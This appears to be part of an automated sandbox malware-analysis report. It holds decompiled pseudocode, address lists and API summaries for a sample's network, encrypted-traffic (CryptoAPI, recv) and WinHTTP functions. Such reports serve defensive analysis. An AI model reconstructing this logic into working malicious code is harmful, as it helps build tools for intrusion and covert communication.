				signed int _t114;
				void* _t116;
				void* _t118;
				signed short _t120;
				signed int _t121;
				void* _t122;
				int _t124;
				void* _t132;
				void* _t135;
				void* _t139;
				intOrPtr* _t147;
				intOrPtr _t152;
				int _t156;
				signed int _t159;
				signed int _t162;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				signed int _t169;
				int _t176;
				void* _t181;
				intOrPtr _t183;
				int _t184;
				void* _t188;
				void* _t189;
				void* _t190;
				void* _t191;

				_t147 = __ebx;
				_t181 = 0x200;
				_t92 =  *0x3e8538(0x200);
				_v12 = _t92;
				_t93 =  *0x3e8538(0x200);
				_v16 = _v16 & 0x00000000;
				_t176 = _a12;
				_v8 = _t93;
				_t94 =  *(__ebx + 0x32c);
				if(_t94 == 0) {
					L4:
					if(_v16 == _t176) {
						L39:
						 *0x3e8540(_v12);
						 *0x3e8540(_v8);
						_t98 = 1;
						L41:
						return _t98;
					}
					while(1) {
						_t152 = _a4;
						if(_t152 != 0) {
							goto L14;
						}
						_t113 =  *(_t147 + 0x330);
						if(_t113 < 0x384) {
							L11:
							_t114 =  *(_t147 + 0x330);
							if(_t114 < 0x1c2) {
								L22:
								if(E003DFB73( *_t147, _v12, _t181) != 0x200) {
									L40:
									 *0x3e8540(_v12);
									 *0x3e8540(_v8);
									_t98 = 0;
									goto L41;
								}
								_t183 = _a4;
								if(_t183 != 0) {
									 *((intOrPtr*)(_t183 + 0x130)) =  *((intOrPtr*)(_t183 + 0x130)) + 1;
								} else {
									 *(_t147 + 0x330) =  *(_t147 + 0x330) + 1;
								}
								if( *((char*)(_v12 + 2)) != 3) {
									goto L40;
								} else {
									_t56 = _t147 + 0x134; // 0x134
									_t57 = _t147 + 0x124; // 0x124
									_push(_v8);
									_t108 = _v12 + 3;
									if(_t183 == 0) {
										_push(0x1fd);
										_push(_t108);
										_t69 = _t147 + 0x100; // 0x100
										_t110 = E003D3BB7();
										_t189 = _t189 + 0x18;
										if(_t110 == 0) {
											goto L40;
										}
										L32:
										_t112 =  *_v8;
										if(_t112 == 5) {
											L38:
											if(_v16 != _t176) {
												_t181 = 0x200;
												continue;
											}
											goto L39;
										}
										if(_t112 != 2) {
											goto L40;
										}
										_t120 =  *(_v8 + 9) & 0x0000ffff;
										__imp__#9(_t120);
										_t184 = _t120 & 0x0000ffff;
										if(_t184 > 0x1f2) {
											goto L40;
										}
										_t121 = _v16;
										_t156 = _t176 - _t121;
										_t122 = _t121 + _a8;
										if(_t184 > _t156) {
											memcpy(_t122, _v8 + 0xb, _t156);
											_t159 = _v16;
											_t124 = _t184 - _t176 + _t159;
											 *(_t147 + 0x32c) = _t124;
											_t85 = _t147 + 0x13a; // 0x13a
											memcpy(_t85, _v8 - _t159 + _t176 + 0xb, _t124);
											_t189 = _t189 + 0x18;
											_v16 = _t176;
										} else {
											memcpy(_t122, _v8 + 0xb, _t184);
											_t189 = _t189 + 0xc;
											_v16 = _v16 + _t184;
										}
										goto L38;
									}
									_push(0x1fd);
									_push(_t108);
									_t60 = _t147 + 0x100; // 0x100
									_t132 = E003D3BB7();
									_t190 = _t189 + 0x18;
									if(_t132 == 0) {
										goto L40;
									}
									_t135 = E003D3BB7(_t183 + 0xf8, _v8, 0x1fd, _v12, _t183 + 0x11c, _t183 + 0x12c);
									_t191 = _t190 + 0x18;
									if(_t135 == 0) {
										goto L40;
									}
									_t162 = 0x7f;
									memcpy(_v8, _v12, _t162 << 2);
									_t189 = _t191 + 0xc;
									asm("movsb");
									_t176 = _a12;
									goto L32;
								}
							}
							_t166 = 0x32;
							_t169 = _t114 % _t166;
							if(_t169 != 0) {
								goto L22;
							}
							_push(1);
							_push(_t169);
							L21:
							_push(_t147);
							_t116 = E003D43AE();
							_t189 = _t189 + 0xc;
							if(_t116 == 0) {
								goto L40;
							}
							goto L22;
						}
						_t167 = 0x64;
						_t175 = _t113 % _t167;
						if(_t113 % _t167 != 0) {
							goto L11;
						}
						_t118 = E003D43AE(_t147, _t175, _t175);
						_t189 = _t189 + 0xc;
						if(_t118 == 0) {
							goto L40;
						}
						goto L11;
						L14:
						_t99 =  *(_t152 + 0x130);
						if(_t99 < 0x384) {
							L18:
							_t100 =  *(_t152 + 0x130);
							if(_t100 < 0x1c2) {
								goto L22;
							}
							_t164 = 0x32;
							if(_t100 % _t164 != 0) {
								goto L22;
							}
							_push(1);
							_push(_a4);
							goto L21;
						}
						_t165 = 0x64;
						_t173 = _t99 % _t165;
						if(_t99 % _t165 != 0) {
							L17:
							_t152 = _a4;
							goto L18;
						}
						_t139 = E003D43AE(_t147, _a4, _t173);
						_t189 = _t189 + 0xc;
						if(_t139 == 0) {
							goto L40;
						}
						goto L17;
					}
				}
				if(_t94 <= _t176) {
					_t17 = _t147 + 0x13a; // 0x13a
					memcpy(_a8, _t17, _t94);
					_t189 = _t189 + 0xc;
					 *(__ebx + 0x32c) =  *(__ebx + 0x32c) & 0x00000000;
					_v16 =  *(__ebx + 0x32c);
					goto L4;
				}
				_t7 = _t147 + 0x13a; // 0x13a
				_t188 = _t7;
				memcpy(_a8, _t188, _t176);
				 *(__ebx + 0x32c) =  *(__ebx + 0x32c) - _t176;
				_t13 = _t176 + 0x13a; // 0x13a
				memcpy(_v12, __ebx + _t13,  *(__ebx + 0x32c));
				memcpy(_t188, _v12,  *(__ebx + 0x32c));
				goto L39;
			}













































    0x003d48f6
    0x003d48fe
    0x003d4904
    0x003d490b
    0x003d490e
    0x003d4914
    0x003d4918
    0x003d491b
    0x003d491e
    0x003d4928
    0x003d4994
    0x003d4997
    0x003d4bae
    0x003d4bb1
    0x003d4bba
    0x003d4bc2
    0x003d4bd9
    0x003d4bde
    0x003d4bde
    0x003d49a4
    0x003d49a4
    0x003d49a9
    0x00000000
    0x00000000
    0x003d49ab
    0x003d49b6
    0x003d49d6
    0x003d49d6
    0x003d49e1
    0x003d4a51
    0x003d4a63
    0x003d4bc5
    0x003d4bc8
    0x003d4bd1
    0x003d4bd7
    0x00000000
    0x003d4bd7
    0x003d4a69
    0x003d4a6e
    0x003d4a78
    0x003d4a70
    0x003d4a70
    0x003d4a70
    0x003d4a85
    0x00000000
    0x003d4a8b
    0x003d4a8b
    0x003d4a92
    0x003d4a9c
    0x003d4a9f
    0x003d4aa4
    0x003d4b01
    0x003d4b06
    0x003d4b07
    0x003d4b0e
    0x003d4b13
    0x003d4b18
    0x00000000
    0x00000000
    0x003d4b1e
    0x003d4b21
    0x003d4b25
    0x003d4ba5
    0x003d4ba8
    0x003d499f
    0x00000000
    0x003d499f
    0x00000000
    0x003d4ba8
    0x003d4b29
    0x00000000
    0x00000000
    0x003d4b32
    0x003d4b37
    0x003d4b3d
    0x003d4b46
    0x00000000
    0x00000000
    0x003d4b48
    0x003d4b4d
    0x003d4b4f
    0x003d4b54
    0x003d4b75
    0x003d4b7a
    0x003d4b7f
    0x003d4b83
    0x003d4b93
    0x003d4b9a
    0x003d4b9f
    0x003d4ba2
    0x003d4b56
    0x003d4b5f
    0x003d4b64
    0x003d4b67
    0x003d4b67
    0x00000000
    0x003d4b54
    0x003d4aab
    0x003d4aac
    0x003d4aad
    0x003d4ab4
    0x003d4ab9
    0x003d4abe
    0x00000000
    0x00000000
    0x003d4ae0
    0x003d4ae5
    0x003d4aea
    0x00000000
    0x00000000
    0x003d4af8
    0x003d4af9
    0x003d4af9
    0x003d4afb
    0x003d4afc
    0x00000000
    0x003d4afc
    0x003d4a85
    0x003d49e7
    0x003d49e8
    0x003d49ec
    0x00000000
    0x00000000
    0x003d49ee
    0x003d49f0
    0x003d4a40
    0x003d4a40
    0x003d4a41
    0x003d4a46
    0x003d4a4b
    0x00000000
    0x00000000
    0x00000000
    0x003d4a4b
    0x003d49bc
    0x003d49bd
    0x003d49c1
    0x00000000
    0x00000000
    0x003d49c6
    0x003d49cb
    0x003d49d0
    0x00000000
    0x00000000
    0x00000000
    0x003d49f3
    0x003d49f3
    0x003d49fe
    0x003d4a23
    0x003d4a23
    0x003d4a2e
    0x00000000
    0x00000000
    0x003d4a34
    0x003d4a39
    0x00000000
    0x00000000
    0x003d4a3b
    0x003d4a3d
    0x00000000
    0x003d4a3d
    0x003d4a04
    0x003d4a05
    0x003d4a09
    0x003d4a20
    0x003d4a20
    0x00000000
    0x003d4a20
    0x003d4a10
    0x003d4a15
    0x003d4a1a
    0x00000000
    0x00000000
    0x00000000
    0x003d4a1a
    0x003d49a4
    0x003d492c
    0x003d4972
    0x003d497c
    0x003d4987
    0x003d498a
    0x003d4991
    0x00000000
    0x003d4991
    0x003d492f
    0x003d492f
    0x003d4939
    0x003d493e
    0x003d494a
    0x003d4955
    0x003d4964
    0x00000000

    APIs
    • memcpy.MSVCRT ref: 003D4939
    • memcpy.MSVCRT ref: 003D4955
    • memcpy.MSVCRT ref: 003D4964
    • memcpy.MSVCRT ref: 003D497C
    • memcpy.MSVCRT ref: 003D4B9A
      • Part of subcall function 003D43AE: memset.MSVCRT ref: 003D43DC
      • Part of subcall function 003D43AE: htons.WS2_32(?), ref: 003D43F8
      • Part of subcall function 003D43AE: memset.MSVCRT ref: 003D44C5
      • Part of subcall function 003D43AE: memset.MSVCRT ref: 003D44E8
      • Part of subcall function 003D43AE: htons.WS2_32(?), ref: 003D4524
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBB0
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBC9
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBD8
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBED
      • Part of subcall function 003DFB73: htons.WS2_32(?), ref: 003DFC25
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFCA2
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFCB8
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFCD6
      • Part of subcall function 003D3BB7: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,000001FD,?,?,?,?,00000000,00000200), ref: 003D3BCF
      • Part of subcall function 003D3BB7: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000020), ref: 003D3C60
      • Part of subcall function 003D3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003D3C71
      • Part of subcall function 003D3BB7: CryptImportKey.ADVAPI32(?,00000000,0000001C,00000000,00000000,?), ref: 003D3D87
      • Part of subcall function 003D3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003D3DD2
      • Part of subcall function 003D3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003D3DF2
      • Part of subcall function 003D3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003D3DFD
    • htons.WS2_32(?), ref: 003D4B37
    • memcpy.MSVCRT ref: 003D4B5F
    • memcpy.MSVCRT ref: 003D4B75
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003DFB73, Relevance: 12.1, APIs: 8, Instructions: 143network
    C-Code - Quality: 56%
    			E003DFB73(intOrPtr* __esi, void* _a4, int _a8) {
				void* _v8;
				void* _v12;
				void* __ebx;
				void* _t42;
				void* _t43;
				int _t44;
				int _t48;
				signed short _t49;
				void _t50;
				signed int _t51;
				void* _t52;
				int _t54;
				void* _t72;
				int _t73;
				void* _t75;
				int _t77;
				int _t79;
				void* _t80;
				signed int _t87;
				int _t91;
				void* _t97;
				int _t99;
				void* _t101;
				intOrPtr* _t102;
				void* _t103;
				void* _t104;

				_t102 = __esi;
				_t42 =  *0x3e8538(0x10000, _t97, _t72, _t80, _t80);
				_v8 = _t42;
				_t43 =  *0x3e8538(0x10000);
				_t73 = _a8;
				_v12 = _t43;
				_t44 =  *(__esi + 0x1006c);
				_t99 = 0;
				if(_t44 == 0) {
					L4:
					__eflags = _t99 - _t73;
					if(_t99 != _t73) {
						while(1) {
							_t75 = _v8;
							_t48 = E003DF4EF(_t75,  *_t102, 5);
							__eflags = _t48;
							if(_t48 == 0) {
								break;
							}
							_t49 =  *(_t75 + 3) & 0x0000ffff;
							__imp__#9(_t49);
							_t87 = _t49 & 0x0000ffff;
							_t50 =  *_t75;
							__eflags = _t50 - 0x16;
							if(_t50 == 0x16) {
								L8:
								_t51 = E003DF4EF(_t75,  *_t102, _t87);
								__eflags = _t51;
								if(_t51 == 0) {
									break;
								} else {
									_t91 = _t51 & 0x8000000f;
									__eflags = _t91;
									if(__eflags < 0) {
										__eflags = (_t91 - 0x00000001 | 0xfffffff0) + 1;
									}
									if(__eflags != 0) {
										break;
									} else {
										 *((intOrPtr*)(_t102 + 0x10078)) =  *((intOrPtr*)(_t102 + 0x10078)) + 1;
										_t24 = _t102 + 0x5c; // 0x105c
										asm("adc dword [esi+0x1007c], 0x0");
										_t25 = _t102 + 0x3c; // 0x103c
										_t52 = E003DEF6B(_t75, _t51, _v12, _t25, _t24, 0);
										_t104 = _t103 + 0x18;
										_t77 = _t52 - 0x15;
										__eflags = _t77;
										if(_t77 < 0) {
											break;
										} else {
											_t54 = _a8 - _t99;
											__eflags = _t77 - _t54;
											if(_t77 > _t54) {
												memcpy(_a4 + _t99, _v12, _t54);
												_t79 = _t77 - _a8 + _t99;
												__eflags = _t79;
												_t35 = _t102 + 0x6c; // 0x106c
												 *(_t102 + 0x1006c) = _t79;
												memcpy(_t35, _v12 - _t99 + _a8, _t79);
												_t99 = _a8;
												_t103 = _t104 + 0x18;
											} else {
												memcpy(_a4 + _t99, _v12, _t77);
												_t103 = _t104 + 0xc;
												_t99 = _t99 + _t77;
											}
											__eflags = _t99 - _a8;
											if(_t99 != _a8) {
												continue;
											} else {
												_t73 = _a8;
											}
										}
									}
								}
							} else {
								__eflags = _t50 - 0x17;
								if(_t50 != 0x17) {
									break;
								} else {
									goto L8;
								}
							}
							goto L18;
						}
						_t73 = 0;
					}
				} else {
					if(_t44 <= _t73) {
						_t15 = _t102 + 0x6c; // 0x106c
						memcpy(_a4, _t15, _t44);
						_t99 =  *(__esi + 0x1006c);
						_t103 = _t103 + 0xc;
						_t18 = __esi + 0x1006c;
						 *_t18 =  *(__esi + 0x1006c) & 0x00000000;
						__eflags =  *_t18;
						goto L4;
					} else {
						_t5 = _t102 + 0x6c; // 0x106c
						_t101 = _t5;
						memcpy(_a4, _t101, _t73);
						 *(__esi + 0x1006c) =  *(__esi + 0x1006c) - _t73;
						_t11 = _t73 + 0x6c; // 0x106c
						memcpy(_v8, __esi + _t11,  *(__esi + 0x1006c));
						memcpy(_t101, _v8,  *(__esi + 0x1006c));
					}
				}
				L18:
				 *0x3e8540(_v12);
				 *0x3e8540(_v8);
				return _t73;
			}





























    0x003dfb73
    0x003dfb80
    0x003dfb87
    0x003dfb8a
    0x003dfb90
    0x003dfb93
    0x003dfb96
    0x003dfb9d
    0x003dfba2
    0x003dfc02
    0x003dfc02
    0x003dfc04
    0x003dfc0a
    0x003dfc0a
    0x003dfc11
    0x003dfc18
    0x003dfc1a
    0x00000000
    0x00000000
    0x003dfc20
    0x003dfc25
    0x003dfc2b
    0x003dfc2e
    0x003dfc30
    0x003dfc32
    0x003dfc3c
    0x003dfc3f
    0x003dfc46
    0x003dfc48
    0x00000000
    0x003dfc4e
    0x003dfc50
    0x003dfc50
    0x003dfc56
    0x003dfc5c
    0x003dfc5c
    0x003dfc5d
    0x00000000
    0x003dfc63
    0x003dfc63
    0x003dfc6c
    0x003dfc6f
    0x003dfc77
    0x003dfc80
    0x003dfc87
    0x003dfc8a
    0x003dfc8a
    0x003dfc8d
    0x00000000
    0x003dfc8f
    0x003dfc92
    0x003dfc94
    0x003dfc96
    0x003dfcb8
    0x003dfcc8
    0x003dfcc8
    0x003dfccc
    0x003dfcd0
    0x003dfcd6
    0x003dfcdb
    0x003dfcde
    0x003dfc98
    0x003dfca2
    0x003dfca7
    0x003dfcaa
    0x003dfcaa
    0x003dfce1
    0x003dfce4
    0x00000000
    0x003dfcea
    0x003dfcea
    0x003dfcea
    0x003dfce4
    0x003dfc8d
    0x003dfc5d
    0x003dfc34
    0x003dfc34
    0x003dfc36
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003dfc36
    0x00000000
    0x003dfc32
    0x003dfd07
    0x003dfd07
    0x003dfba4
    0x003dfba6
    0x003dfbe6
    0x003dfbed
    0x003dfbf2
    0x003dfbf8
    0x003dfbfb
    0x003dfbfb
    0x003dfbfb
    0x00000000
    0x003dfba8
    0x003dfba9
    0x003dfba9
    0x003dfbb0
    0x003dfbb5
    0x003dfbc1
    0x003dfbc9
    0x003dfbd8
    0x003dfbdd
    0x003dfba6
    0x003dfced
    0x003dfcf0
    0x003dfcf9
    0x003dfd06

    APIs
    • memcpy.MSVCRT ref: 003DFBB0
    • memcpy.MSVCRT ref: 003DFBC9
    • memcpy.MSVCRT ref: 003DFBD8
    • memcpy.MSVCRT ref: 003DFBED
      • Part of subcall function 003DF4EF: recv.WS2_32(?,00000000,003DF7A5,00000000), ref: 003DF519
    • htons.WS2_32(?), ref: 003DFC25
      • Part of subcall function 003DEF6B: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000024,?,?,00000001,?,0000000F,00000010), ref: 003DEFA8
      • Part of subcall function 003DEF6B: CryptImportKey.ADVAPI32(00000000,00000000,0000001C,00000000,00000000,00000010,00000010), ref: 003DEFF7
      • Part of subcall function 003DEF6B: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 003DF00A
      • Part of subcall function 003DEF6B: memcpy.MSVCRT ref: 003DF01E
      • Part of subcall function 003DEF6B: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000000), ref: 003DF040
      • Part of subcall function 003DEF6B: CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,?,?), ref: 003DF05D
      • Part of subcall function 003DEF6B: CryptDestroyKey.ADVAPI32(?), ref: 003DF06A
      • Part of subcall function 003DEF6B: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003DF074
      • Part of subcall function 003DEF6B: memcpy.MSVCRT ref: 003DF0AA
      • Part of subcall function 003DEF6B: CryptDestroyKey.ADVAPI32(?), ref: 003DF0B5
      • Part of subcall function 003DEF6B: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003DF0C0
    • memcpy.MSVCRT ref: 003DFCA2
    • memcpy.MSVCRT ref: 003DFCB8
    • memcpy.MSVCRT ref: 003DFCD6
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003E1510, Relevance: 12.1, APIs: 8, Instructions: 119time
    APIs
    • WinHttpCloseHandle.WINHTTP(?), ref: 003E1540
    • WinHttpSetTimeouts.WINHTTP(?,00015F90,00015F90,002932E0,0002BF20), ref: 003E1561
    • WinHttpOpenRequest.WINHTTP(00000004,?,00000004,00000000,00000000,00000000,?), ref: 003E1598
    • WinHttpSetOption.WINHTTP(00000000,0000001F,00000004,00000004), ref: 003E15BE
    • WinHttpSendRequest.WINHTTP(?,?,?,?,?,?,00000000), ref: 003E15E1
    • WinHttpReceiveResponse.WINHTTP(?,00000000), ref: 003E15F0
    • WinHttpQueryHeaders.WINHTTP(?,20000013,00000000,?,00000004,00000000), ref: 003E160D
    • WinHttpCloseHandle.WINHTTP(?), ref: 003E1634
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003E13D0, Relevance: 12.1, APIs: 8, Instructions: 117time
    APIs
    • WinHttpCloseHandle.WINHTTP(?), ref: 003E1400
    • WinHttpSetTimeouts.WINHTTP(?,00015F90,00015F90,0002BF20,000927C0), ref: 003E1421
    • WinHttpOpenRequest.WINHTTP(?,?,00000004,00000000,00000000,00000000,?), ref: 003E1458
    • WinHttpSetOption.WINHTTP(00000000,0000001F,00000004,00000004), ref: 003E147A
    • WinHttpSendRequest.WINHTTP(?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003E148E
    • WinHttpCloseHandle.WINHTTP(?), ref: 003E14B2
    • WinHttpReceiveResponse.WINHTTP(?,00000000), ref: 003E14CF
    • WinHttpQueryHeaders.WINHTTP(?,20000013,00000000,?,00000004,00000000), ref: 003E14EC
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003C69F0, Relevance: 10.7, APIs: 7, Instructions: 224
    C-Code - Quality: 91%
    			E003C69F0(intOrPtr __eax, intOrPtr _a4, intOrPtr* _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v216;
				void* __ebx;
				void* __edi;
				void* _t48;
				void* _t52;
				void* _t55;
				short* _t59;
				void* _t71;
				void* _t77;
				intOrPtr _t79;
				intOrPtr _t85;
				intOrPtr _t112;
				intOrPtr _t114;
				intOrPtr* _t115;
				void* _t119;
				void* _t120;
				void* _t121;
				void* _t122;
				void* _t123;
				void* _t124;

				_t44 = __eax;
				_push(0x34);
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				L003CA47E();
				_t120 = _t119 + 4;
				if(__eax == 0) {
					_t79 = 0;
					__eflags = 0;
				} else {
					_t44 = E003C70B0(__eax);
					_t79 = _t44;
				}
				_push(0x34);
				L003CA47E();
				_t121 = _t120 + 4;
				_t127 = _t44;
				if(_t44 == 0) {
					_t112 = 0;
					__eflags = 0;
				} else {
					_t112 = E003C70B0(_t44);
				}
				E003C9090(_t127,  &_v216, 0xcf);
				_t48 = E003C3C70( &_v12,  &_v216,  &_v8,  &_v12);
				_t122 = _t121 + 0x14;
				_t128 = _t48;
				if(_t48 != 0) {
					L8:
					_t49 = _v8;
					if(_v8 != 0) {
						_t94 = _v12;
						if(_v12 > 4) {
							_t71 = E003E09A0(_a4, _t79,  &_v216, _t49, _t94);
							E003CBB40(_v8);
							_t122 = _t122 + 0x18;
							_v8 = 0;
							_v12 = 0;
							if(_t71 == 0) {
								goto L11;
							}
						}
					}
				} else {
					E003C9090(_t128,  &_v216, 0x10);
					_t77 = E003C3C70( &_v216,  &_v216,  &_v8,  &_v12);
					_t122 = _t122 + 0x14;
					if(_t77 == 0) {
						L11:
						if(_t79 != 0) {
							E003CCB70(_t79, _t79, _t112);
							_push(_t79);
							L003C1CB0();
							_t122 = _t122 + 4;
						}
						_t79 = 0;
					} else {
						goto L8;
					}
				}
				E003C9090(0,  &_v216, 0x12);
				_t52 = E003CF550( &_v8, 0,  &_v216, 0xa,  &_v8,  &_v12);
				_t123 = _t122 + 0x1c;
				if(_t52 == 0 || E003C9020(_t112, _a4, _v8, _v12) == 0) {
					if(_t112 != 0) {
						E003CCB70(_t79, _t112, _t112);
						_push(_t112);
						L003C1CB0();
						_t123 = _t123 + 4;
					}
					_t112 = 0;
				}
				if(_t79 == 0) {
					__eflags = _t112;
					if(_t112 == 0) {
						_t114 = _v16;
						goto L43;
					} else {
						_v16 = 1;
						goto L26;
					}
				} else {
					if(_t112 == 0 ||  *((intOrPtr*)(_t79 + 0x10)) >  *((intOrPtr*)(_t112 + 0x10))) {
						_v16 = 2;
						 *_a8 = _t79;
						_t142 = _t112;
						if(_t112 != 0) {
							E003CCB70(_t79, _t112, _t112);
							_push(_t112);
							goto L28;
						}
					} else {
						L26:
						 *_a8 = _t112;
						__eflags = _t79;
						if(__eflags != 0) {
							E003CCB70(_t79, _t79, _t112);
							_push(_t79);
							L28:
							L003C1CB0();
							_t123 = _t123 + 4;
						}
					}
					_t115 = _a8;
					_t55 = E003C2150(_t142,  *_t115);
					_t124 = _t123 + 4;
					if(_t55 == 0) {
						_t59 =  *((intOrPtr*)( *_t115 + 0x14));
						if(_t59 != 0) {
							_t85 = 0x7fffffff;
							while( *_t59 != 0) {
								_t59 = _t59 + 2;
								_t85 = _t85 - 1;
								if(_t85 != 0) {
									continue;
								} else {
								}
								goto L37;
							}
							__eflags = _t85;
							if(_t85 != 0) {
								_t117 = 0x7fffffff - _t85;
								__eflags = 0x7fffffff;
								E003C9090(0x7fffffff,  &_v216, 0xcd);
								_t37 = _t117 + 2; // 0x80000001
								E003C1A80( &_v216,  &_v216,  *((intOrPtr*)( *_a8 + 0x14)), 0x7fffffff - _t85 + _t37);
								_t124 = _t124 + 0x14;
							}
						}
					}
					L37:
					_t114 = _v16;
					if(_t114 != 0) {
						L44:
						return _t114;
					} else {
						if(_t79 != 0) {
							E003CCB70(_t79, _t79, _t112);
							_push(_t79);
							L003C1CB0();
							_t124 = _t124 + 4;
						}
						if(_t112 == 0) {
							L43:
							 *_a8 = 0;
							goto L44;
						} else {
							E003CCB70(_t79, _t112, _t112);
							_push(_t112);
							L003C1CB0();
							 *_a8 = 0;
							return _t114;
						}
					}
				}
			}


























    0x003c69f0
    0x003c69fe
    0x003c6a00
    0x003c6a03
    0x003c6a06
    0x003c6a09
    0x003c6a0e
    0x003c6a13
    0x003c6a20
    0x003c6a20
    0x003c6a15
    0x003c6a17
    0x003c6a1c
    0x003c6a1c
    0x003c6a22
    0x003c6a24
    0x003c6a29
    0x003c6a2c
    0x003c6a2e
    0x003c6a3b
    0x003c6a3b
    0x003c6a30
    0x003c6a37
    0x003c6a37
    0x003c6a49
    0x003c6a5d
    0x003c6a62
    0x003c6a65
    0x003c6a67
    0x003c6a92
    0x003c6a92
    0x003c6a97
    0x003c6a99
    0x003c6a9f
    0x003c6aaf
    0x003c6aba
    0x003c6ac1
    0x003c6ac4
    0x003c6ac7
    0x003c6acc
    0x00000000
    0x00000000
    0x003c6acc
    0x003c6a9f
    0x003c6a69
    0x003c6a72
    0x003c6a86
    0x003c6a8b
    0x003c6a90
    0x003c6ace
    0x003c6ad0
    0x003c6ad4
    0x003c6ad9
    0x003c6ada
    0x003c6adf
    0x003c6adf
    0x003c6ae2
    0x00000000
    0x00000000
    0x00000000
    0x003c6a90
    0x003c6aed
    0x003c6b05
    0x003c6b0a
    0x003c6b0f
    0x003c6b2a
    0x003c6b2e
    0x003c6b33
    0x003c6b34
    0x003c6b39
    0x003c6b39
    0x003c6b3c
    0x003c6b3c
    0x003c6b40
    0x003c6b68
    0x003c6b6a
    0x003c6c38
    0x00000000
    0x003c6b70
    0x003c6b70
    0x00000000
    0x003c6b70
    0x003c6b42
    0x003c6b44
    0x003c6b51
    0x003c6b58
    0x003c6b5a
    0x003c6b5c
    0x003c6b60
    0x003c6b65
    0x00000000
    0x003c6b65
    0x003c6b77
    0x003c6b77
    0x003c6b7a
    0x003c6b7c
    0x003c6b7e
    0x003c6b82
    0x003c6b87
    0x003c6b88
    0x003c6b88
    0x003c6b8d
    0x003c6b8d
    0x003c6b7e
    0x003c6b90
    0x003c6b96
    0x003c6b9b
    0x003c6ba0
    0x003c6ba4
    0x003c6ba9
    0x003c6bab
    0x003c6bb0
    0x003c6bb6
    0x003c6bb9
    0x003c6bba
    0x00000000
    0x00000000
    0x003c6bbc
    0x00000000
    0x003c6bba
    0x003c6bbe
    0x003c6bc0
    0x003c6bd3
    0x003c6bd3
    0x003c6bd5
    0x003c6bdf
    0x003c6bef
    0x003c6bf4
    0x003c6bf4
    0x003c6bc0
    0x003c6ba9
    0x003c6bf7
    0x003c6bf7
    0x003c6bfc
    0x003c6c45
    0x003c6c4c
    0x003c6bfe
    0x003c6c00
    0x003c6c04
    0x003c6c09
    0x003c6c0a
    0x003c6c0f
    0x003c6c0f
    0x003c6c14
    0x003c6c3b
    0x003c6c3e
    0x00000000
    0x003c6c16
    0x003c6c18
    0x003c6c1d
    0x003c6c1e
    0x003c6c2d
    0x003c6c37
    0x003c6c37
    0x003c6c14
    0x003c6bfc

    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 003C6A09
    • ??2@YAPAXI@Z.MSVCRT ref: 003C6A24
    • ??3@YAXPAX@Z.MSVCRT ref: 003C6C1E
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
    • ??3@YAXPAX@Z.MSVCRT ref: 003C6ADA
    • ??3@YAXPAX@Z.MSVCRT ref: 003C6B34
    • ??3@YAXPAX@Z.MSVCRT ref: 003C6B88
    • ??3@YAXPAX@Z.MSVCRT ref: 003C6C0A
      • Part of subcall function 003CCB70: SysFreeString.OLEAUT32(?), ref: 003CCB81
